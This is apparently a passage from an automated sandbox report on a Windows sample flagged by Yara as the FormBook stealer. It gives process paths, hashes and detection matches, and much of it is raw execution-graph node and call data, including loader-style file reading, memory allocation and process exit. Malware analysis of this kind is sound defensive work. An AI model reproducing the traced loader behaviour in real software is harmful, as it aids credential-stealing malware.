                                                                                        MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3518328881.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3518268838.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3517222370.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:9
                                                                                        Start time:14:43:38
                                                                                        Start date:01/11/2024
                                                                                        Path:C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe"
                                                                                        Imagebase:0x730000
                                                                                        File size:140'800 bytes
                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3520205826.0000000004FC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:10
                                                                                        Start time:14:43:50
                                                                                        Start date:01/11/2024
                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                        Imagebase:0x7ff6bf500000
                                                                                        File size:676'768 bytes
                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true


                                                                                          Execution Graph

                                                                                          Execution Coverage:2.7%
                                                                                          Dynamic/Decrypted Code Coverage:2.1%
                                                                                          Signature Coverage:3.4%
                                                                                          Total number of Nodes:1631
                                                                                          Total number of Limit Nodes:41
execution_graph

[Execution graph: the report renders this as an interactive call graph. The serialised node list (node id, code address, API and library labels) and edge list (caller id -> callee id) that the renderer consumes were dumped here as flat text and are not readable in that form, so the raw node and edge data is omitted from this portion of the page; the dump continues in the next section. The Windows API functions that appear as node labels in this portion are listed below by area.]

Window and message handling: PeekMessageW, GetInputState, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, IsDialogMessageW, GetClassLongW, GetForegroundWindow, CreateWindowExW, ShowWindow, Shell_NotifyIconW, CharUpperBuffW, CharLowerBuffW
Timing and waiting: Sleep, timeGetTime, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, WaitForSingleObjectEx
Process and environment: IsDebuggerPresent, IsProcessorFeaturePresent, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, IsWow64Process, GetVersionExW, GetSystemInfo, GetNativeSystemInfo, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RaiseException
Modules and memory: LoadLibraryA, GetProcAddress, FreeLibrary, GetModuleHandleW, GetModuleFileNameW, VirtualProtect, RtlAllocateHeap, RtlFreeHeap
Files and handles: CreateFileW, WriteFile, SetFilePointerEx, GetFileType, GetFileAttributesW, FindFirstFileW, FindClose, GetFullPathNameW, SetCurrentDirectoryW, lstrlenW, GetStdHandle, CloseHandle, GetLastError
Registry and shell: RegOpenKeyExW, RegQueryValueExW, RegCloseKey, ShellExecuteW
Synchronisation: EnterCriticalSection, LeaveCriticalSection, SetEvent, ResetEvent

Non-API node labels in this portion are CRT and C++ runtime symbols (for example __wsopen_s, __fread_nolock, _wcslen, __Init_thread_wait, __onexit, __dosmaperr, ___scrt_fastfail, _ValidateLocalCookies, BuildCatchObjectHelperInternal, ISource) and call-count summaries of the form "N API calls".
calls 96762 7d4c52 96760->96762 96761 7d9cb3 22 API calls 96761->96764 96763 7d515f 22 API calls 96762->96763 96766 7d4c5e 96763->96766 96764->96759 96764->96761 96765 7d515f 22 API calls 96764->96765 96767 7d4c29 96764->96767 96765->96764 96766->96679 96767->96760 96767->96766 96850 7d4e90 LoadLibraryA 96768->96850 96773 7d4ef6 LoadLibraryExW 96858 7d4e59 LoadLibraryA 96773->96858 96774 813ccf 96775 7d4f39 68 API calls 96774->96775 96778 813cd6 96775->96778 96780 7d4e59 3 API calls 96778->96780 96782 813cde 96780->96782 96781 7d4f20 96781->96782 96783 7d4f2c 96781->96783 96880 7d50f5 96782->96880 96784 7d4f39 68 API calls 96783->96784 96786 7d2ea5 96784->96786 96786->96686 96786->96687 96789 813d05 96790->96693 96791->96696 96792->96701 96793->96711 96794->96719 96795->96723 96796->96728 96797->96733 96798->96736 96799->96740 96800->96744 96801->96737 96802->96743 96803->96747 96804->96751 96805->96751 96806->96751 96807->96751 96809 842d15 96808->96809 96810 7d511f 64 API calls 96809->96810 96811 842d29 96810->96811 97011 842e66 96811->97011 96814 7d50f5 40 API calls 96815 842d56 96814->96815 96816 7d50f5 40 API calls 96815->96816 96817 842d66 96816->96817 96818 7d50f5 40 API calls 96817->96818 96819 842d81 96818->96819 96820 7d50f5 40 API calls 96819->96820 96821 842d9c 96820->96821 96822 7d511f 64 API calls 96821->96822 96823 842db3 96822->96823 96824 7fea0c ___std_exception_copy 21 API calls 96823->96824 96825 842dba 96824->96825 96826 7fea0c ___std_exception_copy 21 API calls 96825->96826 96827 842dc4 96826->96827 96828 7d50f5 40 API calls 96827->96828 96829 842dd8 96828->96829 96830 8428fe 27 API calls 96829->96830 96832 842dee 96830->96832 96831 842d3f 96831->96689 96832->96831 97017 8422ce 96832->97017 96835 7d4f4a 96834->96835 96836 7d4f43 96834->96836 96838 7d4f59 96835->96838 96839 7d4f6a FreeLibrary 96835->96839 96837 7fe678 67 API calls 96836->96837 96837->96835 96838->96690 96839->96838 96840->96703 96841->96707 96842->96713 96843->96718 96844->96722 
96845->96727 96846->96731 96848 7daec9 22 API calls 96847->96848 96849 7d4c78 96848->96849 96849->96757 96851 7d4ea8 GetProcAddress 96850->96851 96852 7d4ec6 96850->96852 96853 7d4eb8 96851->96853 96855 7fe5eb 96852->96855 96853->96852 96854 7d4ebf FreeLibrary 96853->96854 96854->96852 96888 7fe52a 96855->96888 96857 7d4eea 96857->96773 96857->96774 96859 7d4e8d 96858->96859 96860 7d4e6e GetProcAddress 96858->96860 96863 7d4f80 96859->96863 96861 7d4e7e 96860->96861 96861->96859 96862 7d4e86 FreeLibrary 96861->96862 96862->96859 96864 7efe0b 22 API calls 96863->96864 96865 7d4f95 96864->96865 96866 7d5722 22 API calls 96865->96866 96867 7d4fa1 __fread_nolock 96866->96867 96868 7d50a5 96867->96868 96869 813d1d 96867->96869 96879 7d4fdc 96867->96879 96940 7d42a2 CreateStreamOnHGlobal 96868->96940 96951 84304d 74 API calls 96869->96951 96872 813d22 96874 7d511f 64 API calls 96872->96874 96873 7d50f5 40 API calls 96873->96879 96875 813d45 96874->96875 96876 7d50f5 40 API calls 96875->96876 96878 7d506e ISource 96876->96878 96878->96781 96879->96872 96879->96873 96879->96878 96946 7d511f 96879->96946 96881 813d70 96880->96881 96882 7d5107 96880->96882 96973 7fe8c4 96882->96973 96885 8428fe 96994 84274e 96885->96994 96887 842919 96887->96789 96891 7fe536 BuildCatchObjectHelperInternal 96888->96891 96889 7fe544 96913 7ff2d9 20 API calls __dosmaperr 96889->96913 96891->96889 96893 7fe574 96891->96893 96892 7fe549 96914 8027ec 26 API calls __wsopen_s 96892->96914 96894 7fe579 96893->96894 96895 7fe586 96893->96895 96915 7ff2d9 20 API calls __dosmaperr 96894->96915 96905 808061 96895->96905 96899 7fe58f 96900 7fe595 96899->96900 96901 7fe5a2 96899->96901 96916 7ff2d9 20 API calls __dosmaperr 96900->96916 96917 7fe5d4 LeaveCriticalSection __fread_nolock 96901->96917 96902 7fe554 __wsopen_s 96902->96857 96906 80806d BuildCatchObjectHelperInternal 96905->96906 96918 802f5e EnterCriticalSection 96906->96918 96908 80807b 96919 8080fb 96908->96919 96912 8080ac __wsopen_s 
96912->96899 96913->96892 96914->96902 96915->96902 96916->96902 96917->96902 96918->96908 96920 80811e 96919->96920 96921 808177 96920->96921 96928 808088 96920->96928 96935 7f918d EnterCriticalSection 96920->96935 96936 7f91a1 LeaveCriticalSection 96920->96936 96922 804c7d __dosmaperr 20 API calls 96921->96922 96923 808180 96922->96923 96925 8029c8 _free 20 API calls 96923->96925 96926 808189 96925->96926 96926->96928 96937 803405 11 API calls 2 library calls 96926->96937 96932 8080b7 96928->96932 96929 8081a8 96938 7f918d EnterCriticalSection 96929->96938 96939 802fa6 LeaveCriticalSection 96932->96939 96934 8080be 96934->96912 96935->96920 96936->96920 96937->96929 96938->96928 96939->96934 96941 7d42bc FindResourceExW 96940->96941 96942 7d42d9 96940->96942 96941->96942 96943 8135ba LoadResource 96941->96943 96942->96879 96943->96942 96944 8135cf SizeofResource 96943->96944 96944->96942 96945 8135e3 LockResource 96944->96945 96945->96942 96947 7d512e 96946->96947 96949 813d90 96946->96949 96952 7fece3 96947->96952 96951->96872 96955 7feaaa 96952->96955 96954 7d513c 96954->96879 96957 7feab6 BuildCatchObjectHelperInternal 96955->96957 96956 7feac2 96968 7ff2d9 20 API calls __dosmaperr 96956->96968 96957->96956 96958 7feae8 96957->96958 96970 7f918d EnterCriticalSection 96958->96970 96961 7feac7 96969 8027ec 26 API calls __wsopen_s 96961->96969 96963 7feaf4 96971 7fec0a 62 API calls 2 library calls 96963->96971 96965 7feb08 96972 7feb27 LeaveCriticalSection __fread_nolock 96965->96972 96967 7fead2 __wsopen_s 96967->96954 96968->96961 96969->96967 96970->96963 96971->96965 96972->96967 96976 7fe8e1 96973->96976 96975 7d5118 96975->96885 96977 7fe8ed BuildCatchObjectHelperInternal 96976->96977 96978 7fe92d 96977->96978 96979 7fe900 ___scrt_fastfail 96977->96979 96980 7fe925 __wsopen_s 96977->96980 96991 7f918d EnterCriticalSection 96978->96991 96989 7ff2d9 20 API calls __dosmaperr 96979->96989 96980->96975 96982 7fe937 96992 7fe6f8 38 API calls 4 library calls 
96982->96992 96985 7fe91a 96990 8027ec 26 API calls __wsopen_s 96985->96990 96986 7fe94e 96993 7fe96c LeaveCriticalSection __fread_nolock 96986->96993 96989->96985 96990->96980 96991->96982 96992->96986 96993->96980 96997 7fe4e8 96994->96997 96996 84275d 96996->96887 97000 7fe469 96997->97000 96999 7fe505 96999->96996 97001 7fe478 97000->97001 97003 7fe48c 97000->97003 97008 7ff2d9 20 API calls __dosmaperr 97001->97008 97007 7fe488 __alldvrm 97003->97007 97010 80333f 11 API calls 2 library calls 97003->97010 97004 7fe47d 97009 8027ec 26 API calls __wsopen_s 97004->97009 97007->96999 97008->97004 97009->97007 97010->97007 97013 842e7a 97011->97013 97012 7d50f5 40 API calls 97012->97013 97013->97012 97014 8428fe 27 API calls 97013->97014 97015 842d3b 97013->97015 97016 7d511f 64 API calls 97013->97016 97014->97013 97015->96814 97015->96831 97016->97013 97018 8422d9 97017->97018 97020 8422e7 97017->97020 97019 7fe5eb 29 API calls 97018->97019 97019->97020 97021 84232c 97020->97021 97022 7fe5eb 29 API calls 97020->97022 97041 8422f0 97020->97041 97046 842557 40 API calls __fread_nolock 97021->97046 97024 842311 97022->97024 97024->97021 97026 84231a 97024->97026 97025 842370 97027 842374 97025->97027 97028 842395 97025->97028 97026->97041 97054 7fe678 97026->97054 97031 842381 97027->97031 97033 7fe678 67 API calls 97027->97033 97047 842171 97028->97047 97036 7fe678 67 API calls 97031->97036 97031->97041 97032 84239d 97034 8423c3 97032->97034 97035 8423a3 97032->97035 97033->97031 97067 8423f3 74 API calls 97034->97067 97037 8423b0 97035->97037 97039 7fe678 67 API calls 97035->97039 97036->97041 97040 7fe678 67 API calls 97037->97040 97037->97041 97039->97037 97040->97041 97041->96831 97042 8423ca 97043 8423de 97042->97043 97044 7fe678 67 API calls 97042->97044 97043->97041 97045 7fe678 67 API calls 97043->97045 97044->97043 97045->97041 97046->97025 97048 7fea0c ___std_exception_copy 21 API calls 97047->97048 97049 84217f 97048->97049 97050 7fea0c 
___std_exception_copy 21 API calls 97049->97050 97051 842190 97050->97051 97052 7fea0c ___std_exception_copy 21 API calls 97051->97052 97053 84219c 97052->97053 97053->97032 97055 7fe684 BuildCatchObjectHelperInternal 97054->97055 97056 7fe6aa 97055->97056 97057 7fe695 97055->97057 97066 7fe6a5 __wsopen_s 97056->97066 97068 7f918d EnterCriticalSection 97056->97068 97085 7ff2d9 20 API calls __dosmaperr 97057->97085 97059 7fe69a 97086 8027ec 26 API calls __wsopen_s 97059->97086 97062 7fe6c6 97069 7fe602 97062->97069 97064 7fe6d1 97087 7fe6ee LeaveCriticalSection __fread_nolock 97064->97087 97066->97041 97067->97042 97068->97062 97070 7fe60f 97069->97070 97071 7fe624 97069->97071 97120 7ff2d9 20 API calls __dosmaperr 97070->97120 97076 7fe61f 97071->97076 97088 7fdc0b 97071->97088 97073 7fe614 97121 8027ec 26 API calls __wsopen_s 97073->97121 97076->97064 97081 7fe646 97105 80862f 97081->97105 97084 8029c8 _free 20 API calls 97084->97076 97085->97059 97086->97066 97087->97066 97089 7fdc23 97088->97089 97093 7fdc1f 97088->97093 97090 7fd955 __fread_nolock 26 API calls 97089->97090 97089->97093 97091 7fdc43 97090->97091 97122 8059be 62 API calls 3 library calls 97091->97122 97094 804d7a 97093->97094 97095 804d90 97094->97095 97096 7fe640 97094->97096 97095->97096 97097 8029c8 _free 20 API calls 97095->97097 97098 7fd955 97096->97098 97097->97096 97099 7fd976 97098->97099 97100 7fd961 97098->97100 97099->97081 97123 7ff2d9 20 API calls __dosmaperr 97100->97123 97102 7fd966 97124 8027ec 26 API calls __wsopen_s 97102->97124 97104 7fd971 97104->97081 97106 80863e 97105->97106 97108 808653 97105->97108 97128 7ff2c6 20 API calls __dosmaperr 97106->97128 97109 80868e 97108->97109 97112 80867a 97108->97112 97130 7ff2c6 20 API calls __dosmaperr 97109->97130 97111 808643 97129 7ff2d9 20 API calls __dosmaperr 97111->97129 97125 808607 97112->97125 97113 808693 97131 7ff2d9 20 API calls __dosmaperr 97113->97131 97117 7fe64c 97117->97076 97117->97084 97118 80869b 97132 8027ec 26 API 
calls __wsopen_s 97118->97132 97120->97073 97121->97076 97122->97093 97123->97102 97124->97104 97133 808585 97125->97133 97127 80862b 97127->97117 97128->97111 97129->97117 97130->97113 97131->97118 97132->97117 97134 808591 BuildCatchObjectHelperInternal 97133->97134 97144 805147 EnterCriticalSection 97134->97144 97136 80859f 97137 8085d1 97136->97137 97138 8085c6 97136->97138 97145 7ff2d9 20 API calls __dosmaperr 97137->97145 97140 8086ae __wsopen_s 29 API calls 97138->97140 97141 8085cc 97140->97141 97146 8085fb LeaveCriticalSection __wsopen_s 97141->97146 97143 8085ee __wsopen_s 97143->97127 97144->97136 97145->97141 97146->97143 97147 7d3156 97150 7d3170 97147->97150 97151 7d3187 97150->97151 97152 7d318c 97151->97152 97153 7d31eb 97151->97153 97194 7d31e9 97151->97194 97154 7d3199 97152->97154 97155 7d3265 PostQuitMessage 97152->97155 97157 812dfb 97153->97157 97158 7d31f1 97153->97158 97160 7d31a4 97154->97160 97161 812e7c 97154->97161 97191 7d316a 97155->97191 97156 7d31d0 DefWindowProcW 97156->97191 97206 7d18e2 10 API calls 97157->97206 97162 7d321d SetTimer RegisterWindowMessageW 97158->97162 97163 7d31f8 97158->97163 97165 7d31ae 97160->97165 97166 812e68 97160->97166 97211 83bf30 34 API calls ___scrt_fastfail 97161->97211 97167 7d3246 CreatePopupMenu 97162->97167 97162->97191 97169 7d3201 KillTimer 97163->97169 97170 812d9c 97163->97170 97164 812e1c 97207 7ee499 42 API calls 97164->97207 97174 7d31b9 97165->97174 97175 812e4d 97165->97175 97195 83c161 97166->97195 97167->97191 97202 7d30f2 Shell_NotifyIconW ___scrt_fastfail 97169->97202 97177 812da1 97170->97177 97178 812dd7 MoveWindow 97170->97178 97180 7d3253 97174->97180 97188 7d31c4 97174->97188 97175->97156 97210 830ad7 22 API calls 97175->97210 97176 812e8e 97176->97156 97176->97191 97181 812da7 97177->97181 97182 812dc6 SetFocus 97177->97182 97178->97191 97179 7d3214 97203 7d3c50 DeleteObject DestroyWindow 97179->97203 97204 7d326f 44 API calls ___scrt_fastfail 97180->97204 97186 812db0 
97181->97186 97181->97188 97182->97191 97205 7d18e2 10 API calls 97186->97205 97187 7d3263 97187->97191 97188->97156 97208 7d30f2 Shell_NotifyIconW ___scrt_fastfail 97188->97208 97192 812e41 97209 7d3837 49 API calls ___scrt_fastfail 97192->97209 97194->97156 97196 83c276 97195->97196 97197 83c179 ___scrt_fastfail 97195->97197 97196->97191 97212 7d3923 97197->97212 97199 83c25f KillTimer SetTimer 97199->97196 97200 83c1a0 97200->97199 97201 83c251 Shell_NotifyIconW 97200->97201 97201->97199 97202->97179 97203->97191 97204->97187 97205->97191 97206->97164 97207->97188 97208->97192 97209->97194 97210->97194 97211->97176 97213 7d393f 97212->97213 97214 7d3a13 97212->97214 97234 7d6270 22 API calls 97213->97234 97214->97200 97216 7d394d 97217 813393 LoadStringW 97216->97217 97218 7d395a 97216->97218 97220 8133ad 97217->97220 97219 7d6b57 22 API calls 97218->97219 97221 7d396f 97219->97221 97228 7d3994 ___scrt_fastfail 97220->97228 97235 7da8c7 22 API calls __fread_nolock 97220->97235 97222 7d397c 97221->97222 97223 8133c9 97221->97223 97222->97220 97225 7d3986 97222->97225 97226 7d6350 22 API calls 97223->97226 97227 7d6350 22 API calls 97225->97227 97229 8133d7 97226->97229 97227->97228 97231 7d39f9 Shell_NotifyIconW 97228->97231 97229->97228 97230 7d33c6 22 API calls 97229->97230 97232 8133f9 97230->97232 97231->97214 97233 7d33c6 22 API calls 97232->97233 97233->97228 97234->97216 97235->97228 97236 7d1033 97241 7d4c91 97236->97241 97240 7d1042 97242 7da961 22 API calls 97241->97242 97243 7d4cff 97242->97243 97249 7d3af0 97243->97249 97246 7d4d9c 97247 7d1038 97246->97247 97252 7d51f7 22 API calls __fread_nolock 97246->97252 97248 7f00a3 29 API calls __onexit 97247->97248 97248->97240 97253 7d3b1c 97249->97253 97252->97246 97254 7d3b0f 97253->97254 97255 7d3b29 97253->97255 97254->97246 97255->97254 97256 7d3b30 RegOpenKeyExW 97255->97256 97256->97254 97257 7d3b4a RegQueryValueExW 97256->97257 97258 7d3b80 RegCloseKey 97257->97258 97259 7d3b6b 97257->97259 
97258->97254 97259->97258 97260 3abc7fb 97263 3abc470 97260->97263 97262 3abc847 97276 3ab9ea0 97263->97276 97266 3abc540 CreateFileW 97268 3abc54d 97266->97268 97273 3abc50f 97266->97273 97267 3abc569 VirtualAlloc 97267->97268 97269 3abc58a ReadFile 97267->97269 97271 3abc76a 97268->97271 97272 3abc75c VirtualFree 97268->97272 97269->97268 97270 3abc5a8 VirtualAlloc 97269->97270 97270->97268 97270->97273 97271->97262 97272->97271 97273->97267 97273->97268 97274 3abc670 CloseHandle 97273->97274 97275 3abc680 VirtualFree 97273->97275 97279 3abd380 GetPEB 97273->97279 97274->97273 97275->97273 97281 3abd320 GetPEB 97276->97281 97278 3aba52b 97278->97273 97280 3abd3aa 97279->97280 97280->97266 97282 3abd34a 97281->97282 97282->97278 97283 7d1cad SystemParametersInfoW 97284 823f75 97295 7eceb1 97284->97295 97286 823f8b 97294 824006 97286->97294 97304 7ee300 23 API calls 97286->97304 97288 7dbf40 207 API calls 97289 824052 97288->97289 97292 824a88 97289->97292 97306 84359c 82 API calls __wsopen_s 97289->97306 97291 823fe6 97291->97289 97305 841abf 22 API calls 97291->97305 97294->97288 97296 7ecebf 97295->97296 97297 7eced2 97295->97297 97307 7daceb 23 API calls ISource 97296->97307 97299 7eced7 97297->97299 97300 7ecf05 97297->97300 97302 7efddb 22 API calls 97299->97302 97308 7daceb 23 API calls ISource 97300->97308 97303 7ecec9 97302->97303 97303->97286 97304->97291 97305->97294 97306->97292 97307->97303 97308->97303 97309 7ddee5 97312 7db710 97309->97312 97313 7db72b 97312->97313 97314 820146 97313->97314 97315 8200f8 97313->97315 97328 7db750 97313->97328 97354 8558a2 207 API calls 2 library calls 97314->97354 97319 820102 97315->97319 97322 82010f 97315->97322 97315->97328 97318 7dba20 97331 7dba4e 97318->97331 97359 84359c 82 API calls __wsopen_s 97318->97359 97352 855d33 207 API calls 97319->97352 97322->97318 97353 8561d0 207 API calls 2 library calls 97322->97353 97325 7ed336 40 API calls 97325->97328 97326 8203d9 97326->97326 97328->97318 97328->97325 
97328->97331 97332 820322 97328->97332 97339 7dbbe0 40 API calls 97328->97339 97340 7dec40 207 API calls 97328->97340 97343 7da81b 41 API calls 97328->97343 97344 7ed2f0 40 API calls 97328->97344 97345 7ea01b 207 API calls 97328->97345 97346 7f0242 5 API calls __Init_thread_wait 97328->97346 97347 7eedcd 22 API calls 97328->97347 97348 7f00a3 29 API calls __onexit 97328->97348 97349 7f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97328->97349 97350 7eee53 82 API calls 97328->97350 97351 7ee5ca 207 API calls 97328->97351 97355 7daceb 23 API calls ISource 97328->97355 97356 82f6bf 23 API calls 97328->97356 97357 7da8c7 22 API calls __fread_nolock 97328->97357 97358 855c0c 82 API calls 97332->97358 97339->97328 97340->97328 97343->97328 97344->97328 97345->97328 97346->97328 97347->97328 97348->97328 97349->97328 97350->97328 97351->97328 97352->97322 97353->97318 97354->97328 97355->97328 97356->97328 97357->97328 97358->97318 97359->97326 97360 7d1044 97365 7d10f3 97360->97365 97362 7d104a 97401 7f00a3 29 API calls __onexit 97362->97401 97364 7d1054 97402 7d1398 97365->97402 97369 7d116a 97370 7da961 22 API calls 97369->97370 97371 7d1174 97370->97371 97372 7da961 22 API calls 97371->97372 97373 7d117e 97372->97373 97374 7da961 22 API calls 97373->97374 97375 7d1188 97374->97375 97376 7da961 22 API calls 97375->97376 97377 7d11c6 97376->97377 97378 7da961 22 API calls 97377->97378 97379 7d1292 97378->97379 97412 7d171c 97379->97412 97383 7d12c4 97384 7da961 22 API calls 97383->97384 97385 7d12ce 97384->97385 97386 7e1940 9 API calls 97385->97386 97387 7d12f9 97386->97387 97433 7d1aab 97387->97433 97389 7d1315 97390 7d1325 GetStdHandle 97389->97390 97391 812485 97390->97391 97392 7d137a 97390->97392 97391->97392 97393 81248e 97391->97393 97395 7d1387 OleInitialize 97392->97395 97394 7efddb 22 API calls 97393->97394 97396 812495 97394->97396 97395->97362 97440 84011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess 
GetCurrentProcess DuplicateHandle 97396->97440 97398 81249e 97441 840944 CreateThread 97398->97441 97400 8124aa CloseHandle 97400->97392 97401->97364 97442 7d13f1 97402->97442 97405 7d13f1 22 API calls 97406 7d13d0 97405->97406 97407 7da961 22 API calls 97406->97407 97408 7d13dc 97407->97408 97409 7d6b57 22 API calls 97408->97409 97410 7d1129 97409->97410 97411 7d1bc3 6 API calls 97410->97411 97411->97369 97413 7da961 22 API calls 97412->97413 97414 7d172c 97413->97414 97415 7da961 22 API calls 97414->97415 97416 7d1734 97415->97416 97417 7da961 22 API calls 97416->97417 97418 7d174f 97417->97418 97419 7efddb 22 API calls 97418->97419 97420 7d129c 97419->97420 97421 7d1b4a 97420->97421 97422 7d1b58 97421->97422 97423 7da961 22 API calls 97422->97423 97424 7d1b63 97423->97424 97425 7da961 22 API calls 97424->97425 97426 7d1b6e 97425->97426 97427 7da961 22 API calls 97426->97427 97428 7d1b79 97427->97428 97429 7da961 22 API calls 97428->97429 97430 7d1b84 97429->97430 97431 7efddb 22 API calls 97430->97431 97432 7d1b96 RegisterWindowMessageW 97431->97432 97432->97383 97434 7d1abb 97433->97434 97435 81272d 97433->97435 97436 7efddb 22 API calls 97434->97436 97449 843209 23 API calls 97435->97449 97438 7d1ac3 97436->97438 97438->97389 97439 812738 97440->97398 97441->97400 97450 84092a 28 API calls 97441->97450 97443 7da961 22 API calls 97442->97443 97444 7d13fc 97443->97444 97445 7da961 22 API calls 97444->97445 97446 7d1404 97445->97446 97447 7da961 22 API calls 97446->97447 97448 7d13c6 97447->97448 97448->97405 97449->97439 97451 3abc250 97452 3ab9ea0 GetPEB 97451->97452 97453 3abc2f1 97452->97453 97465 3abc140 97453->97465 97455 3abc31a CreateFileW 97457 3abc36e 97455->97457 97458 3abc369 97455->97458 97457->97458 97459 3abc385 VirtualAlloc 97457->97459 97459->97458 97460 3abc3a3 ReadFile 97459->97460 97460->97458 97461 3abc3be 97460->97461 97462 3abb140 13 API calls 97461->97462 97463 3abc3f1 97462->97463 97464 3abc414 ExitProcess 97463->97464 97464->97458 97466 
3abc149 Sleep 97465->97466 97467 3abc157 97466->97467 97468 7dddc0 97471 7daa19 97468->97471 97470 7dddcc 97472 7daa3a 97471->97472 97479 7daa8f 97471->97479 97473 7dec40 207 API calls 97472->97473 97472->97479 97475 7daa6b 97473->97475 97477 7daabe 97475->97477 97480 7daceb 23 API calls ISource 97475->97480 97476 81f907 97476->97476 97477->97470 97479->97477 97481 84359c 82 API calls __wsopen_s 97479->97481 97480->97479 97481->97476 97482 7d2de3 97483 7d2df0 __wsopen_s 97482->97483 97484 7d2e09 97483->97484 97485 812c2b ___scrt_fastfail 97483->97485 97486 7d3aa2 23 API calls 97484->97486 97487 812c47 GetOpenFileNameW 97485->97487 97488 7d2e12 97486->97488 97489 812c96 97487->97489 97498 7d2da5 97488->97498 97491 7d6b57 22 API calls 97489->97491 97494 812cab 97491->97494 97494->97494 97495 7d2e27 97516 7d44a8 97495->97516 97499 811f50 __wsopen_s 97498->97499 97500 7d2db2 GetLongPathNameW 97499->97500 97501 7d6b57 22 API calls 97500->97501 97502 7d2dda 97501->97502 97503 7d3598 97502->97503 97504 7da961 22 API calls 97503->97504 97505 7d35aa 97504->97505 97506 7d3aa2 23 API calls 97505->97506 97507 7d35b5 97506->97507 97508 7d35c0 97507->97508 97514 8132eb 97507->97514 97509 7d515f 22 API calls 97508->97509 97511 7d35cc 97509->97511 97546 7d35f3 97511->97546 97513 81330d 97514->97513 97552 7ece60 41 API calls 97514->97552 97515 7d35df 97515->97495 97517 7d4ecb 94 API calls 97516->97517 97518 7d44cd 97517->97518 97519 813833 97518->97519 97521 7d4ecb 94 API calls 97518->97521 97520 842cf9 80 API calls 97519->97520 97522 813848 97520->97522 97523 7d44e1 97521->97523 97524 813869 97522->97524 97525 81384c 97522->97525 97523->97519 97526 7d44e9 97523->97526 97530 7efe0b 22 API calls 97524->97530 97529 7d4f39 68 API calls 97525->97529 97527 813854 97526->97527 97528 7d44f5 97526->97528 97577 83da5a 82 API calls 97527->97577 97576 7d940c 136 API calls 2 library calls 97528->97576 97529->97527 97539 8138ae 97530->97539 97533 7d2e31 97534 813862 97534->97524 97535 813a5f 
97541 813a67 97535->97541 97536 7d4f39 68 API calls 97536->97541 97539->97535 97539->97541 97543 7d9cb3 22 API calls 97539->97543 97553 83967e 97539->97553 97556 840b5a 97539->97556 97562 7da4a1 97539->97562 97570 7d3ff7 97539->97570 97578 8395ad 42 API calls _wcslen 97539->97578 97541->97536 97579 83989b 82 API calls __wsopen_s 97541->97579 97543->97539 97547 7d3605 97546->97547 97551 7d3624 __fread_nolock 97546->97551 97549 7efe0b 22 API calls 97547->97549 97548 7efddb 22 API calls 97550 7d363b 97548->97550 97549->97551 97550->97515 97551->97548 97552->97514 97554 7efe0b 22 API calls 97553->97554 97555 8396ae __fread_nolock 97554->97555 97555->97539 97557 840b65 97556->97557 97558 7efddb 22 API calls 97557->97558 97559 840b7c 97558->97559 97560 7d9cb3 22 API calls 97559->97560 97561 840b87 97560->97561 97561->97539 97563 7da52b 97562->97563 97569 7da4b1 __fread_nolock 97562->97569 97565 7efe0b 22 API calls 97563->97565 97564 7efddb 22 API calls 97566 7da4b8 97564->97566 97565->97569 97567 7efddb 22 API calls 97566->97567 97568 7da4d6 97566->97568 97567->97568 97568->97539 97569->97564 97571 7d400a 97570->97571 97573 7d40ae 97570->97573 97572 7efe0b 22 API calls 97571->97572 97575 7d403c 97571->97575 97572->97575 97573->97539 97574 7efddb 22 API calls 97574->97575 97575->97573 97575->97574 97576->97533 97577->97534 97578->97539 97579->97541

Control-flow Graph: function 7d42de-7d434d (GetVersionExW, IsWow64Process, LoadLibraryA/GetProcAddress, GetNativeSystemInfo, GetSystemInfo); executed / not-executed block rendering omitted.
APIs
• GetVersionExW.KERNEL32(?), ref: 007D430D
  • Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A
• GetCurrentProcess.KERNEL32(?,0086CB64,00000000,?,?), ref: 007D4422
• IsWow64Process.KERNEL32(00000000,?,?), ref: 007D4429
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 007D4454
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 007D4466
• GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 007D4474
• FreeLibrary.KERNEL32(00000000,?,?), ref: 007D447B
• GetSystemInfo.KERNEL32(?,?,?), ref: 007D44A0
Strings
Memory Dump Source
